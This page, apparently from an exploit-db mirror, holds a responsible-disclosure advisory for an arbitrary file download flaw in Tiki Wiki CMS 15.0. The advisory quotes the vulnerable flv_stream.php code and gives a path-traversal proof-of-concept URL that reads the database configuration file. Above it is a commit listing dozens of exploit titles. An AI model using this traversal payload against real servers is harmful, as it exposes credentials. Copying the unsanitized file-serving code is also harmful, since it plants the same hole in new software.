bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40080.txt
Offensive Security fc4bc08825 DB: 2016-07-12 
15 new exploits

Apache HTTPd - Arbitrary Long HTTP Headers DoS
Apache HTTPd - Arbitrary Long HTTP Headers DoS (Perl)

Apache HTTPd - Arbitrary Long HTTP Headers DoS
Apache HTTPd - Arbitrary Long HTTP Headers DoS (C)

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (c code)
Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit (C) (1)

Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) (c code)
Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (C) (2)
Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (1)
Webhints <= 1.03 - Remote Command Execution Exploit (c code) (2)
Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (3)
Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (1)
Webhints <= 1.03 - Remote Command Execution Exploit (C) (2)
Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (3)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl Code)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C Code)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C)

SimpleBBS <= 1.1 - Remote Commands Execution Exploit (c code)
SimpleBBS <= 1.1 - Remote Commands Execution Exploit (C)

Xmame 0.102 (-lang) Local Buffer Overflow Exploit (c code)
Xmame 0.102 - (lang) Local Buffer Overflow Exploit (C)

aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability
aFAQ 1.0 - (faqDsp.asp catcode) Remote SQL Injection Vulnerability

Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)
Apple CFNetwork - HTTP Response Denial of Service Exploit (RB)

PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability
PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion Vulnerability

WebPortal CMS <= 0.7.4 (code) Remote Code Execution Vulnerability
WebPortal CMS <= 0.7.4 - (code) Remote Code Execution Vulnerability

emergecolab 1.0 (sitecode) Local File Inclusion Vulnerability
emergecolab 1.0 - (sitecode) Local File Inclusion Vulnerability

Simple Machines Forums (BBCode) Cookie Stealing Vulnerability
Simple Machines Forums - (BBCode) Cookie Stealing Vulnerability

Movie PHP Script 2.0 (init.php anticode) Code Execution Vulnerability
Movie PHP Script 2.0 - (init.php anticode) Code Execution Vulnerability

Kjtechforce mailman b1 (code) SQL Injection Delete Row Vulnerability
Kjtechforce mailman b1 - (code) SQL Injection Delete Row Vulnerability

WordPress Activity Log Plugin 2.3.1 - Persistent XSS

IPS Community Suite 4.1.12.3 - PHP Code Injection
Adobe Flash - ATF Processing Overflow
Adobe Flash - JXR Processing Double Free
Adobe Flash - LMZA Property Decoding Heap Corruption
Adobe Flash - ATF Image Packing Overflow
Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (msf)

Ho' Detector (Promiscuous mode detector shellcode) (56 bytes)
Ho' Detector - Promiscuous mode detector shellcode (56 bytes)

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

Ruby on Rails ActionPack Inline ERB Code Execution

Lan Messenger sending PM Buffer Overflow (UNICODE) - Overwrite SEH
Lan Messenger - sending PM Buffer Overflow (UNICODE) Overwrite SEH
Tiki Wiki CMS 15.0 - Arbitrary File Download
Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass
WordPress All in One SEO Pack Plugin 2.3.6.1 - Persistent XSS
Device42 WAN Emulator 2.3 Traceroute Command Injection
Device42 WAN Emulator 2.3 Ping Command Injection
Device42 WAN Emulator 2.3 - Traceroute Command Injection
Device42 WAN Emulator 2.3 - Ping Command Injection

Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash

Dell KACE K1000 File Upload
Dell KACE K1000 - File Upload

Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection
Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection

Valve Steam 3.42.16.13 - Local Privilege Escalation
Beauty Parlour & SPA Saloon Management System - Blind SQL Injection
Clinic Management System - Blind SQL Injection

Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes
2016-07-12 05:05:04 +00:00

57 lines
1.4 KiB
Text
Executable file
Raw Blame History

# Exploit Title: Tiki Wiki CMS 15.0 Arbitrary File Download
# Date: 11-07-2016
# Software Link: https://tiki.org
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
Using `flv_stream.php` file from `vendor` directory we can download any file.
http://security.szurek.pl/tiki-wiki-cms-150-arbitrary-file-download.html
File: tiki-15.0\vendor\player\flv\flv_stream.php
<?php
session_cache_limiter('nocache');
header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
header('Pragma: no-cache');
$position = $_GET['position'];
$filename = dirname(__FILE__).'/'.htmlspecialchars($_GET['file']);
if (file_exists($filename)) {
header('Content-Type: video/x-flv');
if ($position != 0) {
echo 'FLV', pack('CCNN', 1, 1, 9, 9);
}
$file = fopen($filename, "rb");
fseek($file, $position);
while (!feof($file)) {
echo fread($file, 16384);
}
fclose($file);
} else {
echo 'The file does not exist';
}
?>
2. Proof of Concept
Example for downloading database configuration:
http://tiki/vendor/player/flv/flv_stream.php?file=../../../db/local.php&position=0
3. Solution:
Update to version 15.1
Timeline:
01-06-2016: Discovered
01-06-2016: Vendor notified
08-06-2016: Version 15.1 released, issue resolved
Reference in a new issue View git blame Copy permalink